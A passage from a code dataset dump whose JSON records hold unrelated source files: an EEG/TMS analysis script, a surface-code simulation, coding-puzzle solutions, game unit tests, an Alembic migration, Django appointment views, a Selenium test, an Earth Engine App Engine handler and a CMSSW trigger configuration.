title='Quit?')\r\ncore.quit()\r\n","sub_path":"Phase 5.py","file_name":"Phase 5.py","file_ext":"py","file_size_in_byte":24640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"451614276","text":"import mne\nimport scipy\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom pathlib import Path\nfrom scipy.integrate import simps\nimport os\nos.chdir(\"//lagringshotell/imb-jstormlab/Data/Anesthesia_Project/EEG_Analysis\")\nfrom pci_st import *\n\n\n# define path and filename (here you might want to loop over datasets!)\nfilename = \"ane_SD_EMG_1016_sed_tms_2.vhdr\"\nfilepath = Path(\"//lagringshotell/imb-jstormlab/Data/Anesthesia_Project/EEG/ane_SD_1016\")\n#filepath = Path(\"E:/Anesthesia/EEG/ane_SD_1016\")\nfile = filepath / filename\n\n \ndef plot_response(signal, argument):\n \"\"\"plot response to check what happened with the data\"\"\"\n if \"time\" in argument:\n signal.plot(duration=10, remove_dc=False)\n if \"psd\" in argument:\n signal.plot_psd(fmin=0, fmax=80)\n if \"butter\" in argument:\n signal.plot(butterfly=True, color='#00000044', bad_color='r')\n if \"ica\" in argument:\n signal.plot_components()\n\n\ndef detect_bad_ch(eeg):\n \"\"\"plots each channel so user can decide whether good (mouse click) or bad (enter / space)\"\"\"\n good_ch, bad_ch = [], []\n intvl = eeg.__len__() // 20\n if type(eeg) is mne.epochs.EpochsArray:\n # Benny's way is way too slow.... and a bit ugly... \n # Let's try it MNE style\n n_chan = eeg.ch_names.__len__()\n n_disp = 8\n for i in range(0,n_chan,n_disp):\n # Choose 4 channels at a time\n cur_picks = eeg.ch_names[i:(i + n_disp)]\n fig = eeg.plot(picks=cur_picks, title='Click channel names to reject, click on epochs to reject epoch; Use mouse to move around figure, press any key to advance')\n\n # Wait until keyboard is pressed\n while not plt.waitforbuttonpress(): \n print('Inspecting channels..')\n\n plt.close(fig)\n return eeg\n else:\n for ch in eeg.ch_names:\n \"\"\"loop over each channel and plot to decide if bad\"\"\"\n time_data = eeg[eeg.ch_names.index(ch)][0][0]\n df = pd.DataFrame()\n for i in range(20):\n df_window = pd.DataFrame(time_data[i * intvl:(i + 1) * intvl])\n df_window += (i + 1) * 0.0001\n df = pd.concat((df, df_window), axis=1)\n\n df *= 1000 # just for plotting\n fig = plt.figure(figsize=(14, 8))\n fig.suptitle(f\"{ch}: mouse click for keep (good), any other key for remove (bad)\")\n ax1 = plt.subplot2grid((3, 3), (0, 0), colspan=1)\n ax2 = plt.subplot2grid((3, 3), (0, 1), colspan=2, rowspan=3)\n ax1.psd(time_data, 5000, 5000)\n ax1.set_xlim([0, 55])\n ax2.plot(df, 'b')\n plt.show()\n\n if not plt.waitforbuttonpress():\n good_ch.append(ch)\n plt.close(fig)\n else:\n bad_ch.append(ch)\n plt.close(fig)\n\n return good_ch, bad_ch\n\ndef detect_bad_ic(ica_data, data_orig):\n \"\"\"plots each independent component so user can decide whether good (mouse click) or bad (enter / space)\"\"\"\n good_ic, bad_ic = [], []\n bad_list = []\n \"!!Change back to full range!!\"\n for c in range((ica_data.get_components().shape[1])): \n \"\"\"loop over each channel and plot to decide if bad\"\"\"\n ica_data.plot_properties(inst=data_orig, picks=c)\n\n if not plt.waitforbuttonpress():\n good_ic.append(c)\n plt.close()\n else:\n bad_ic.append(c)\n plt.close()\n\n #[bad_list.append(ica_data.ch_names.index(ci)) for ci in bad_ic]\n return bad_ic\n\n\n \n# Make feature that asks for parameters by inspecting the data\ndef TMS_interpolate(data,tmin=-2.5,tmax=5, pulse_start = -0.002, pulse_end = 0.007): # interpolates TMS pulses\n events = mne.events_from_annotations(data) #Generate an event file for pulses and annotations:\n\n #Epoch data using function (setting index 0 for events 
selects a list in the array obj. events):\n \"Baseline correct??\"\n baseline = (None, 0.0)\n data = mne.Epochs(data, events[0], tmin=tmin, tmax=tmax, preload=True)\n #epochs.plot()\n mne.preprocessing.fix_stim_artifact(data, events=events[0], event_id='Response/R128', tmin=pulse_start, tmax=pulse_end)\n\n return data\n\n# 1. load data (vhdr file)\ndata = mne.io.read_raw_brainvision(file)\ndata.load_data()\n# plot_response(data, 'time')\n\n# 2 channel info (remove EMG and set type for EOG channels)\n#data.drop_channels('EMG')\ndata.set_channel_types({'VEOG': 'eog', 'HEOG': 'eog'})\ndata.set_montage('standard_1005')\n\n# 3. Replace TMS pulse artefact with noise based on baseline statistics\ndata = TMS_interpolate(data) # look at function to change\n# data.apply_baseline(None,0.0) ; Done in function now\n\n\n# 4. filter (first high- then low-pass; notch-filter?)\nl_cut, h_cut = 0.5, 45\ndata.filter(l_freq=l_cut, h_freq=h_cut)\n# plot_response(data, 'psd')\n\n# 5. resample (with low-pass filter!)\nnew_sampling = 1000\ndata.resample(new_sampling, npad='auto')\n#plot_response(data, ['time', 'psd'])\n\n# 6. Crop epochs.\ndata = data.crop(tmin=-0.2, tmax=0.5)\n\n#!!!!!!!!!!!TEMPORARY FIX!!!!!!!!!\ndata = mne.EpochsArray(data._data, info=data.info, tmin=-0.2)\n\n# 7. remove bad channels (or do not remove but track them)\n#good, bad = detect_bad_ch(data)\ndata = detect_bad_ch(data)\nbad = data.info['bads'] # keep track of bad channels but do not remove (MNE style)\n#data.drop_channels(bad) # remove bad channels (eeglab style)\ndata = data.interpolate_bads(reset_bads=True) # for presentation of bad channels change to False\n\n\n# 8. PCA + ICA (by default if rank violated)\nn_ic = len(data.ch_names)-len(bad)\nica = mne.preprocessing.ICA(method='infomax', fit_params=dict(extended=True), max_pca_components=n_ic)\nica.fit(data, picks=['eeg', 'eog'])\n\nica.plot_components(inst=data) # show all components interactive (slow)\n# Wait until any key is pressed in the last opened window!!!!\n# !!!! DO NOT CLOSE WINDOWS MANUALLY!!!\nwhile not plt.waitforbuttonpress(): \n print('Inspecting channels..')\nplt.close('all')\n\n# 9. loop through each channel (faster):\n# ica.exclude = detect_bad_ic(ica, data)\nclean_data = data.copy()\nica.apply(clean_data, exclude=ica.exclude)\n\n# 4. filter (first high- then low-pass; notch-filter?)\n# h_cut = 45\n# data.filter()\n# plot_response(data, 'psd')\n\n# 10. Run ICA again to remove any remaining artifacts?\n\n# 11. re-reference to average\nclean_data.set_eeg_reference('average', projection=False) # you might want to go with True\n\n# 12. create evoked data (average over all trials)/ Butterfly plot\n\nevoked_epochs = clean_data.average()\nevoked_epochs.plot_joint() # plots butterfly plot\n\n# remove line-noise by notch filter (not always recommended!)\n#data.notch_filter(freqs=np.arange(50, h_cut, 50))\n\n# 13. Calculate PCI_ST\n# Use same baseline window as above, define response window from evoked response!\npar = {'baseline_window':(-0.2,-0.002), 'response_window':(0.007,50), 'k':1.2, 'min_snr':1.1, 'max_var':99, 'embed':False,'n_steps':100}\npci = calc_PCIst(evoked_epochs.data, evoked_epochs.times, **par)\nprint(pci)\n","sub_path":"Old/EEG_TMS_ANALYSIS (v.2).py","file_name":"EEG_TMS_ANALYSIS (v.2).py","file_ext":"py","file_size_in_byte":7103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"459093936","text":"'''\n2020 Mark Shui Hu, QuTech\n\nwww.github.com/watermarkhu/oop_surface_code\n_____________________________________________\n\n'''\nfrom .. import oopsc\nfrom oopsc.superoperator import superoperator as so\nfrom pprint import pprint\nimport multiprocessing as mp\nimport pandas as pd\nimport sys, os\nSUP_INDICES = ['node', 'pg', 'pn', 'pm', 'pm_1', 'p_bell_success', 'pulse_duration', 'GHZ_success', 'protocol_name']\n\n\ndef get_superoperator_indices(lattices, superoperators):\n index_dict = {\"L\": lattices}\n for att in SUP_INDICES:\n index_dict.update({att: list(set([getattr(s, att) for s in superoperators]))})\n\n return index_dict\n\n\ndef get_current_index(lattice, superoperator):\n index = (lattice,)\n for att in SUP_INDICES:\n value = getattr(superoperator, att) if getattr(superoperator, att) is not None else \"None\"\n index += (value,)\n\n return index\n\n\ndef read_data(file_path):\n try:\n data = pd.read_csv(file_path, header=0, float_precision='round_trip')\n indices = [\"L\", \"p\"] if \"GHZ_success\" not in data else [\"L\", \"pg\", \"GHZ_success\"]\n return data.set_index(indices)\n except FileNotFoundError:\n print(\"File not found\")\n exit()\n\n\ndef get_data(data, latts, probs, P_store=1):\n\n if not latts: latts = []\n if not probs: probs = []\n fitL = data.index.get_level_values(\"L\")\n fitp = data.index.get_level_values(\"p\") if \"p\" in data.index else data.index.get_level_values(\"pg\")\n fitN = data.loc[:, \"N\"].values\n fitt = data.loc[:, \"success\"].values\n\n fitdata = [[] for i in range(4)]\n for L, P, N, t in zip(fitL, fitp, fitN, fitt):\n p = round(float(P)/P_store, 6)\n if all([N != 0, not latts or L in latts, not probs or p in probs]):\n fitdata[0].append(L)\n fitdata[1].append(p)\n fitdata[2].append(N)\n fitdata[3].append(t)\n\n return fitdata[0], fitdata[1], fitdata[2], fitdata[3]\n\n\ndef sim_thresholds(\n decoder,\n lattice_type=\"toric\",\n lattices = [],\n perror = [],\n superoperator_filenames=[],\n superoperator_filenames_additional=None,\n superoperator_filenames_additional_failed=None,\n superoperator_filenames_failed=None,\n GHZ_successes=[1.1],\n networked_architecture=False,\n space_weight=2,\n iters = 0,\n measurement_error=False,\n multithreading=False,\n threads=None,\n save_result=True,\n file_name=\"thres\",\n folder = \".\",\n P_store=1000,\n debug=False,\n cycles=None,\n **kwargs\n ):\n '''\n ############################################\n '''\n run_oopsc = oopsc.multiprocess if multithreading else oopsc.multiple\n\n if measurement_error:\n from ..graph import graph_3D as go\n else:\n from ..graph import graph_2D as go\n\n sys.setrecursionlimit(100000)\n\n get_name = lambda s: s[s.rfind(\".\")+1:]\n g_type = get_name(go.__name__)\n d_type = get_name(decoder.__name__)\n full_name = f\"{lattice_type}_{g_type}_{d_type}_{file_name}\"\n\n if not os.path.exists(folder):\n os.makedirs(folder)\n file_path = folder + \"/\" + full_name + \".csv\"\n\n progressbar = kwargs.pop(\"progressbar\")\n\n data = None\n config = oopsc.default_config(**kwargs)\n\n superoperators = []\n if superoperator_filenames:\n perror = []\n for i, superoperator_filename in enumerate(superoperator_filenames):\n for GHZ_success in GHZ_successes:\n additional = [superoperator_filenames_additional[i]] if superoperator_filenames_additional is not None \\\n else None\n additional.append(superoperator_filenames_additional_failed[i]) if \\\n superoperator_filenames_additional_failed is not None else None\n failed = 
superoperator_filenames_failed[i] if superoperator_filenames_failed is not None else None\n superoperator = so.Superoperator(superoperator_filename, GHZ_success,\n additional_superoperators=additional, failed_ghz_superoperator=failed)\n superoperators.append(superoperator)\n perror.append(superoperator.pg)\n data_s = {s.protocol_name: None for s in superoperators} if superoperators else None\n\n # Simulate and save results to file\n for lati in lattices:\n\n if multithreading:\n if threads is None:\n threads = mp.cpu_count()\n graph = [oopsc.lattice_type(lattice_type, config, decoder, go, lati, cycles=cycles) for _ in range(threads)]\n [g.decoder.set_space_weight(space_weight) for g in graph] if d_type == \"mwpm\" else None\n else:\n graph = oopsc.lattice_type(lattice_type, config, decoder, go, lati, cycles=cycles)\n graph.decoder.set_space_weight(space_weight) if d_type == \"mwpm\" else None\n\n for i, pi in enumerate(perror):\n\n superoperator = None\n if superoperators:\n superoperator = superoperators[i]\n superoperator.reset_stabilizer_rounds()\n networked_architecture = bool(superoperator.pn) if not networked_architecture else True\n data = data_s[superoperator.protocol_name]\n\n print(\"Calculating for L = {}{} and p = {}\".format(lati, ', GHZ_success = ' +\n str(superoperator.GHZ_success) if\n superoperator else \"\", pi))\n\n oopsc_args = dict(\n paulix=pi,\n superoperator=superoperator,\n networked_architecture=networked_architecture,\n lattice_type=lattice_type,\n debug=debug,\n processes=threads,\n progressbar=progressbar\n )\n if measurement_error and not superoperator:\n oopsc_args.update(measurex=pi)\n output = run_oopsc(lati, config, iters, graph=graph, **oopsc_args)\n\n pprint(dict(output))\n print(\"\")\n\n ind_dict = {\"L\": lattices, \"p\": perror} if not superoperator else get_superoperator_indices(lattices,\n superoperators)\n protocol_name = superoperator.protocol_name if superoperator else \"\"\n node_name = superoperator.node if superoperator else \"\"\n if data is None:\n file_path = os.path.join(folder, f\"{protocol_name if protocol_name else ''}{node_name}{full_name}.csv\")\n if os.path.exists(file_path):\n data = pd.read_csv(file_path, header=0, float_precision='round_trip')\n data = data.set_index(list(ind_dict.keys()))\n data.sort_index(inplace=True)\n else:\n columns = list(output.keys())\n index = pd.MultiIndex.from_product([*ind_dict.values()], names=ind_dict.keys())\n data = pd.DataFrame(0, index=index, columns=columns)\n\n cur_index = (lati, pi) if not superoperator else get_current_index(lati, superoperator)\n\n for key, value in output.items():\n if cur_index not in data.index:\n data.loc[cur_index, :] = 0\n data.loc[cur_index, key] = (data.loc[cur_index, key] + value if cur_index in data.index\n and not pd.isna(data.loc[cur_index, key]) else value)\n\n data.sort_index(inplace=True)\n\n if save_result:\n data = data[(data.T.applymap(lambda x: x != 0 and x is not None and not pd.isna(x))).any()]\n data.to_csv(file_path)\n data_s[superoperator.protocol_name] = data if superoperators else None\n\n print(data.to_string())\n\n if save_result:\n print(\"file saved to {}\".format(file_path))\n data.to_csv(file_path)\n","sub_path":"oopsc/threshold/sim.py","file_name":"sim.py","file_ext":"py","file_size_in_byte":8039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"155157724","text":"\"\"\"\nGiven an expression s includes numbers, letters and brackets. Number represents the number of repetitions inside the brackets(can be a string or another expression).Please expand expression to be a string.\n\nHave you met this question in a real interview? Yes\nExample\ns = abc3[a] return abcaaa\ns = 3[abc] return abcabcabc\ns = 4[ac]dy, return acacacacdy\ns = 3[2[ad]3[pf]]xyz, return adadpfpfpfadadpfpfpfadadpfpfpfxyz\n\n\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param: s: an expression includes numbers, letters and brackets\n @return: a string\n \"\"\"\n def expressionExpand(self, s):\n # write your code here\n import string\n if not s:\n return ''\n stk = []\n cnt = 0\n for i in range(len(s)):\n if s[i].isdigit():\n cnt = cnt*10 + int(s[i])\n elif s[i] == '[':\n stk.append(cnt)\n cnt = 0\n elif s[i] == ']':\n strs = []\n while stk:\n node = stk.pop()\n if type(node) == int:\n stk.append(''.join(reversed(strs))*node)\n break\n strs.append(node)\n else:\n stk.append(s[i])\n return ''.join(stk)","sub_path":"lintcode/575_expression_expand.py","file_name":"575_expression_expand.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"343034981","text":"import unittest\nfrom game_object.tank import Enemy, Player, Artillery\nfrom game_object.game_object import Missile, Bomb, Bonus\nimport settings\nfrom constant.constant import OBJ_SIZE\nfrom game.load_level import LoadLevel\n\n\nclass TestTank(unittest.TestCase):\n def setUp(self):\n self.test_load_level = LoadLevel()\n self.test_level = self.test_load_level.load_level(1.5)\n self.test_enemy = Enemy(\n enemies=[Enemy(x=150, y=15, kind=\"fast\", enemies=[], level_map=None)], x=1, y=1, kind=\"hurt\",\n level_map=self.test_level)\n self.test_enemy.enemies.append(Enemy(x=self.test_enemy.x, y=self.test_enemy.y, kind=self.test_enemy.kind,\n enemies=self.test_enemy.enemies, level_map=self.test_level))\n self.test_enemy.direction = 180\n self.test_player = Player(145, 375, enemies=self.test_enemy.enemies, count_of_enemies=2,\n bonus_on_level=[Bonus(145, 375, \"LIFE\")], level_map=self.test_level)\n test_bomb = Bomb(100, 100)\n self.test_player.bomb.append(test_bomb)\n self.test_player.level_map.append(test_bomb)\n self.test_artillery = Artillery(300, 300, level_map=self.test_level)\n\n def test_type(self):\n self.assertEqual(self.test_enemy.speed, 2)\n\n def test_move_enemy(self):\n self.test_enemy.make_move(self.test_player)\n self.test_enemy.update_position(settings.GAME_DISPLAY)\n self.assertEqual(self.test_enemy.y, 2.0)\n\n def test_shoot(self):\n self.test_enemy.shoot(self.test_enemy.direction)\n self.assertTrue(len(self.test_enemy.missile) == 1 and self.test_enemy.missile[0].direction_y == 1)\n\n def test_collision_with_enemy(self):\n self.assertTrue(self.test_player.with_enemy_collision((2, 1)))\n\n def test_collision_with_other_tank(self):\n self.assertTrue(self.test_enemy.with_other_tank_collision((150, 1), self.test_player))\n\n def test_player_shoot(self):\n self.test_player.missile.append(Missile(151, 16, 1, 1, 1, OBJ_SIZE))\n self.test_player.collision_missile_with_enemy()\n self.assertTrue(len(self.test_player.kill_enemy) == 1)\n\n def test_bomb_del(self):\n for bomb in self.test_player.bomb:\n bomb.tick_life += 200\n self.test_player.del_bomb(bomb)\n self.assertTrue(self.test_player.bomb == [])\n\n def test_bomb_kill_enemy(self):\n test_kill_bomb = Bomb(1, 1)\n self.test_player.bomb.append(test_kill_bomb)\n self.test_player.level_map.append(test_kill_bomb)\n self.test_player.enemy_collision_with_bomb()\n self.assertTrue(len(self.test_player.kill_enemy) == 1)\n\n def test_collision_with_bonus(self):\n self.test_player.collision_with_bonus()\n self.assertTrue(self.test_player.hp == 200)\n\n def test_artillery_shoot(self):\n self.test_artillery.count_for_shoot = 150\n self.test_artillery.make_boom(self.test_player, self.test_enemy.enemies)\n self.assertTrue(self.test_player.hp < 0)\n\n def test_artillery_rotate(self):\n self.test_artillery.artillery_rotate(self.test_player)\n self.assertTrue(self.test_artillery.angle == 90)\n","sub_path":"tests/test_tank.py","file_name":"test_tank.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"652804570","text":"\"\"\"Add admin to user table\n\nRevision ID: 25c113963024\nRevises: a1e203fa291c\nCreate Date: 2016-05-10 15:38:32.362699\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '25c113963024'\ndown_revision = 'a1e203fa291c'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n op.add_column('user',\n sa.Column('is_admin', sa.Boolean, default=0))\n\ndef downgrade():\n op.drop_column('user', 'is_admin')\n","sub_path":"alembic/versions/25c113963024_add_admin_to_user_table.py","file_name":"25c113963024_add_admin_to_user_table.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"306170535","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib import messages\nfrom .forms import CitaForm, PacienteForm, MedicoForm\nfrom .models import Medico, Paciente, Cita\nfrom django.contrib.auth.decorators import login_required\n\n#Cita\n\ndef ListaCita(request):\n citas = Cita.objects.all\n return render(request, 'cita/ListaCita.html', {'citas':citas})\n\ndef DetalleCita(request, pk):\n citas = get_object_or_404(Cita, pk=pk)\n return render(request, 'cita/DetalleCita.html', {'citas':citas})\n\n@login_required\ndef NuevaCita(request):\n if request.method == \"POST\":\n formulario = CitaForm(request.POST)\n if formulario.is_valid():\n cita = formulario.save(commit=False)\n for medico_id in request.POST.getlist('medico'):\n for paciente_id in request.POST.getlist('paciente'):\n cita = Cita(medico_id=medico_id,\n paciente_id=paciente_id,\n fecha=formulario.cleaned_data['fecha'],\n hora=formulario.cleaned_data['hora'],\n observaciones=formulario.cleaned_data['observaciones'])\n cita.save()\n messages.add_message(request, messages.SUCCESS, 'Datos guardados')\n return redirect('ListaCita')\n else:\n formulario = CitaForm()\n return render(request, 'cita/EditarCita.html', {'formulario':formulario})\n\n@login_required\ndef EditarCita(request, pk):\n cita = get_object_or_404(Cita, pk=pk)\n if request.method == \"POST\":\n formulario = CitaForm(request.POST, instance=cita)\n if formulario.is_valid():\n cita = formulario.save(commit=False)\n for medico_id in request.POST.getlist('medico'):\n for paciente_id in request.POST.getlist('paciente'):\n cita.save()\n messages.add_message(request, messages.SUCCESS, 'Datos guardados')\n return redirect('ListaCita')\n else:\n formulario = CitaForm(instance=cita)\n return render(request, 'cita/EditarCita.html', {'formulario':formulario})\n\n@login_required\ndef EliminarCita(request, pk):\n cita = get_object_or_404(Cita, pk=pk)\n cita.delete()\n return redirect('ListaCita')\n\n#Paciente\n\ndef ListaPaciente(request):\n pacientes = Paciente.objects.all\n return render(request, 'cita/ListaPaciente.html', {'pacientes':pacientes})\n\ndef DetallePaciente(request, pk):\n pacientes = get_object_or_404(Paciente, pk=pk)\n return render(request, 'cita/DetallePaciente.html', {'pacientes':pacientes})\n\n@login_required\ndef NuevoPaciente(request):\n if request.method == \"POST\":\n formulario = PacienteForm(request.POST)\n if formulario.is_valid():\n paciente = formulario.save(commit=False)\n paciente = Paciente(nombre=formulario.cleaned_data['nombre'],\n apellido=formulario.cleaned_data['apellido'],\n edad=formulario.cleaned_data['edad'],\n sexo=formulario.cleaned_data['sexo'])\n paciente.save()\n messages.add_message(request, messages.SUCCESS, 'Datos guardados')\n return redirect('ListaPaciente')\n else:\n formulario = PacienteForm()\n return render(request, 'cita/EditarPaciente.html', {'formulario':formulario})\n\n@login_required\ndef EditarPaciente(request, pk):\n paciente = get_object_or_404(Paciente, pk=pk)\n if request.method == \"POST\":\n formulario = PacienteForm(request.POST, instance=paciente)\n if formulario.is_valid():\n paciente = formulario.save(commit=False)\n paciente.save()\n messages.add_message(request, messages.SUCCESS, 'Datos guardados')\n return redirect('ListaPaciente')\n else:\n formulario = PacienteForm(instance=paciente)\n return render(request, 'cita/EditarPaciente.html', {'formulario':formulario})\n\n@login_required\ndef EliminarPaciente(request, pk):\n paciente = 
get_object_or_404(Paciente, pk=pk)\n paciente.delete()\n return redirect('ListaPaciente')\n\n#Medico\n\ndef ListaMedico(request):\n medicos = Medico.objects.all\n return render(request, 'cita/ListaMedico.html', {'medicos':medicos})\n\ndef DetalleMedico(request, pk):\n medicos = get_object_or_404(Medico, pk=pk)\n return render(request, 'cita/DetalleMedico.html', {'medicos':medicos})\n\n@login_required\ndef NuevoMedico(request):\n if request.method == \"POST\":\n formulario = MedicoForm(request.POST)\n if formulario.is_valid():\n medico = formulario.save(commit=False)\n medico = Medico(nombre=formulario.cleaned_data['nombre'],\n apellido=formulario.cleaned_data['apellido'],\n especialidad=formulario.cleaned_data['especialidad'],\n telefono=formulario.cleaned_data['telefono'],\n fecha_nacimiento=formulario.cleaned_data['fecha_nacimiento'])\n medico.save()\n messages.add_message(request, messages.SUCCESS, 'Datos guardados')\n return redirect('ListaMedico')\n else:\n formulario = MedicoForm()\n return render(request, 'cita/EditarMedico.html', {'formulario':formulario})\n@login_required\ndef EditarMedico(request, pk):\n medico = get_object_or_404(Medico, pk=pk)\n if request.method == \"POST\":\n formulario = MedicoForm(request.POST, instance=medico)\n if formulario.is_valid():\n medico = formulario.save(commit=False)\n medico.save()\n messages.add_message(request, messages.SUCCESS, 'Datos guardados')\n return redirect('ListaMedico')\n else:\n formulario = MedicoForm(instance=medico)\n return render(request, 'cita/EditarMedico.html', {'formulario':formulario})\n\n@login_required\ndef EliminarMedico(request, pk):\n medico = get_object_or_404(Medico, pk=pk)\n medico.delete()\n return redirect('ListaMedico')\n","sub_path":"citas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"270709575","text":"import time\nimport unittest\n\nfrom request_demo_helper import Application\n\n\nclass DealerScience(unittest.TestCase):\n def setUp(self):\n self.app = Application()\n\n def test_dealer(self):\n self.app.go_to_homepage()\n self.app.click_request_demo()\n self.app.enter_name(\"Tester\")\n self.app.enter_phone(\"1234567890\")\n self.app.enter_email(\"tester@fake.com\")\n self.app.enter_dealership(\"Honda Waltham\")\n self.app.enter_message(\"testing request\")\n self.app.click_submit()\n time.sleep(10)\n self.assertEqual(\"Thank you for contacting us! We will get back to you shortly. Have a great day!\",\n self.app.close_alert_and_get_its_text())\n\n def tearDown(self):\n self.app.destroy()\n\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"test_request_demo.py","file_name":"test_request_demo.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"100411702","text":"unlock_objects = {\r\n \"input_folder_name\": \"Object_Methods\",\r\n \"input_file_name\": \"UnlockObjects\",\r\n \"output_package_name\": \"object\",\r\n \"output_module_name\": \"unlock_objects\",\r\n\r\n \"doc_html\": \"\"\"\r\n Unlocks one or more objects. Locked object are visible, and they can be snapped to. But, they cannot be selected.\r\n \"\"\",\r\n\r\n \"syntax_html\": {\r\n 0: (\"arrObjects\"),\r\n },\r\n\r\n \"params_html\": {\r\n 0: {\r\n \"name\": \"arrObjects\",\r\n \"py_name\": \"objects\",\r\n \"opt_or_req\": \"Required\",\r\n \"type\": \"Array\",\r\n \"name_prefix\": \"arr_of_str\",\r\n \"name_main\": \"Objects\",\r\n \"doc\": \"\"\"\r\n An array of strings identifying the objects to unlock.\r\n \"\"\"\r\n },\r\n },\r\n\r\n \"returns_html\": {\r\n 0: {\r\n \"type\": \"number\",\r\n \"doc\": \"The number of objects unlocked if successful.\"\r\n },\r\n 1: {\r\n \"type\": \"null\",\r\n \"doc\": \"If not successful, or on error.\"\r\n },\r\n },\r\n\r\n \"id_com\": 306,\r\n\r\n \"params_com\": {\r\n 0: {\r\n \"name\": \"vaObjects\",\r\n \"opt_or_req\": \"Required\",\r\n \"type\": \"tagVARIANT\",\r\n },\r\n },\r\n\r\n \"returns_com\": \"tagVARIANT\",\r\n\r\n}\r\n\r\n","sub_path":"py2rhino-project/branches/sandbox2/py2rhino/_make/data/parser_out/object/unlock_objects.py","file_name":"unlock_objects.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"458152611","text":"#!/usr/bin/env python\n\"\"\"A simple example of connecting to Earth Engine using App Engine.\"\"\"\n\n\n\n# Works in the local development environment and when deployed.\n# If successful, shows a single web page with the SRTM DEM\n# displayed in a Google Map. See accompanying README file for\n# instructions on how to set up authentication.\n\nimport os\nimport json\nimport config\nimport sys\n\ndef fix_path():\n sys.path.append(os.path.join(os.path.dirname(__file__), 'lib'))\n\nfix_path()\nimport ee\nimport jinja2\nimport webapp2\nfrom google.appengine.api import memcache\n\njinja_environment = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))\n\nEE_CREDENTIALS = ee.ServiceAccountCredentials(config.EE_ACCOUNT, config.EE_PRIVATE_KEY_FILE)\nclass MainPage(webapp2.RequestHandler):\n def get(self): # pylint: disable=g-bad-name\n \"\"\"Request an image from Earth Engine and render it to a web page.\"\"\"\n \n ee.Initialize(EE_CREDENTIALS)\n region = ee.Geometry.Polygon([[-64.51171875, -5.090944175033373], [-58.359375, -7.18810087117902],[-58.18359375, -2.1088986592431254]]);\n\n def area_analisis(region):\n IMAGE_COLLECTION_ID = 'WHRC/biomass/tropical'\n image =ee.Image(IMAGE_COLLECTION_ID)\n #image = images.mosaic()\n #mapid = image.getMapId({'min': 0, 'max': 1000})\n reduce_args = {\n 'reducer': ee.Reducer.sum(),\n 'geometry': region,\n 'bestEffort': True,\n 'scale': 3000,\n 'maxPixels': 10000000,\n 'tileScale': 1\n }\n multi = (10000*255)\n area_stats = image.float().divide(multi).multiply(ee.Image.pixelArea()).reduceRegion(**reduce_args)\n return area_stats.getInfo()\n #return images\n # These could be put directly into template.render, but it\n # helps make the script more readable to pull them out here, especially\n # if this is expanded to include more variables.\n template_values = {\n 'area': area_analisis(region)['b1']\n }\n template = jinja_environment.get_template('index.html')\n self.response.out.write(template.render(template_values))\n\napp = webapp2.WSGIApplication([('/', MainPage)], debug=True)\n","sub_path":"ee_appengine.py","file_name":"ee_appengine.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"238860475","text":"class Solution:\n # @param matrix, a list of lists of integers\n # @param target, an integer\n # @return a boolean\n def searchMatrix(self, matrix, target):\n n = len(matrix)\n if n == 0:\n return False\n m = len(matrix[0])\n if m == 0:\n return False\n l = 0\n r = n * m - 1\n while l <= r:\n mid = (l + r) >> 1\n x = mid / m\n y = mid % m\n if matrix[x][y] == target:\n return True\n if matrix[x][y] < target:\n l = mid + 1\n else:\n r = mid - 1\n return False\n","sub_path":"LeetCode/search-a-2d-matrix.py","file_name":"search-a-2d-matrix.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"215444524","text":"# /users/rredjimi/Onia_1e33/3e33at441/V9 (CMSSW_4_2_0_HLT33)\n\nimport FWCore.ParameterSet.Config as cms\n\n\nHLTConfigVersion = cms.PSet(\n tableName = cms.string('/users/rredjimi/Onia_1e33/3e33at441/V9')\n)\n\nhltESSL3AbsoluteCorrectionService = cms.ESSource( \"LXXXCorrectionService\",\n appendToDataLabel = cms.string( \"\" ),\n level = cms.string( \"L3Absolute\" ),\n algorithm = cms.string( \"AK5Calo\" ),\n section = cms.string( \"\" ),\n era = cms.string( \"\" ),\n useCondDB = cms.untracked.bool( True )\n)\nhltESSL2RelativeCorrectionService = cms.ESSource( \"LXXXCorrectionService\",\n appendToDataLabel = cms.string( \"\" ),\n level = cms.string( \"L2Relative\" ),\n algorithm = cms.string( \"AK5Calo\" ),\n section = cms.string( \"\" ),\n era = cms.string( \"\" ),\n useCondDB = cms.untracked.bool( True )\n)\nhltESSL1FastJetCorrectionService = cms.ESSource( \"L1FastjetCorrectionService\",\n era = cms.string( \"Jec10V1\" ),\n level = cms.string( \"L1FastJet\" ),\n algorithm = cms.string( \"AK5Calo\" ),\n section = cms.string( \"\" ),\n srcRho = cms.InputTag( 'hltKT6CaloJets','rho' ),\n useCondDB = cms.untracked.bool( True )\n)\nhltESSHcalSeverityLevel = 